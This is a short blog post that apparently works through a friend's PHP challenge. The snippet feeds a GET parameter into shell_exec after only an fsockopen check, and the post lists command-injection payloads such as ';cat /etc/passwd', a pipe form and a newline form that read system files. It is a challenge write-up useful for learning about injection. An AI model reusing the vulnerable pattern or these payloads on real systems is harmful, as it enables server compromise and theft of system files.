PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

<?php
ini_set('error_displays', 0);
 $ip = htmlspecialchars($_GET['url'], ENT_QUOTES);
 $f = fsockopen($ip, 80, $errno, $errstr, 5);
 if($f) {
 	$result = shell_exec('ping -c 1 ' . $ip);
 	echo '<div class="alert alert-success">' . nl2br($result) . '</div>';
} else {
 	echo '<div class="alert alert-danger">' .$errstr . '</div>';
 }
?>

From what I noticed the function fsockopen checks if port 80 is open and if only port 80 is open the $ip variable is passed to shell_exec. Basically fsockopen should return a valid pointer.

If we pass like this

?url=127.0.0.1; cat /etc/passwd

we get this error message.

php_network_getaddresses: getaddrinfo failed: Name or service not known

I simply added a space in front of the IP and noticed that we get a valid pointer from fsockopen 🙂

Resource id #1

Seems like the IP is validated as port 80 is open and the rest is ignored by the function.

?url=127.0.0.1 ;cat /etc/passwd

Other possible ways:

?url=127.0.0.1 |cat /etc/passwd
?url=127.0.0.1%0acat /etc/passwd

screenshot_2

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s